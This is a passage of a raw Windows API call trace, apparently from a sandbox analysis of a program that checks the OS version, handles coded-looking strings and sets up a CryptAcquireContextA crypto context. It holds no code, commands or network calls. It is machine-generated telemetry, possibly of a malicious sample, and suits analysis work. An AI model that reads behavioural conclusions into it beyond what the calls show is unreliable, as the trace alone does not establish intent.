out: hHeap=0x25c0000) returned 1 [0251.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.603] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0251.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.604] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.604] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0251.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.605] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.606] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0251.606] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0251.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.606] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.607] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.607] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.607] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0251.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0251.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.612] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0251.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0251.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0251.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.612] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0251.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.613] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2c70) returned 1 [0251.614] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.614] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.614] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0251.614] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0251.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.615] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0251.615] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.615] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0251.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.615] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.615] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.620] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.620] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.620] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.620] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 